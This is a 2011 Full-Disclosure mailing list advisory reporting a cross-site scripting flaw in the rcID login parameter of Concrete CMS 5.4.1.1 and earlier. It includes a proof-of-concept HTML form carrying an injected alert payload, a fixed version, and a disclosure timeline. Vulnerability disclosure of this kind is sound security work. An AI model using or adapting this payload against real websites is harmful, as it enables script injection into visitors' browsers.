[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Concrete CMS 5.4.1.1 <= Cross Site Scripting

To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>, bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, secalert@xxxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, vuln <vuln@xxxxxxxxxxx>, vuln@xxxxxxxxxxxxxxxx, news@xxxxxxxxxxxxxx, moderators@xxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Concrete CMS 5.4.1.1 <= Cross Site Scripting
From: YGN Ethical Hacker Group <lists@xxxxxxxx>
Date: Tue, 23 Aug 2011 01:45:28 +0800

Concrete CMS 5.4.1.1  <=  Cross Site Scripting


1. OVERVIEW

Concrete CMS 5.4.1.1  and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Concrete5 makes running a website easy. Go to any page in your site,
and a editing toolbar gives you all the controls you need to update
your website. No intimidating manuals, no complicated administration
interfaces - just point and click.


3. VULNERABILITY DESCRIPTION

The rcID parameter is not properly sanitized, which allows attacker to
conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

CMS 5.4.1.1  <=


5. PROOF-OF-CONCEPT/EXPLOIT


vulnerable parameter: rcID

<form action="http://[target]/Concrete/index.php/login/do_login/";
method="post">
<input type="hidden" name="uName" value="test" />
<input type="hidden" name="uPassword" value="test" />
<input type="hidden" name="rcID" value='"
style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/));
onmouseover="alert(/XSS/)' />
<input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" />
</form>


6. SOLUTION

Upgrade to 5.4.2 or higher.


7. VENDOR

Concrete CMS Developers
http://www.concrete5.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-04-14: vulnerability reported
2011-08-04: vendor released fixed version
2011-08-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting
Project Home: http://www.concrete5.org/
Vendor Release Note:
http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/



#yehg [2011-08-23]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] HoG Blog: "Don't be so scared, it's only terrorism"
Next by Date: Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
Previous by thread: [Full-disclosure] HoG Blog: "Don't be so scared, it's only terrorism"
Next by thread: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Index(es):
- Date
- Thread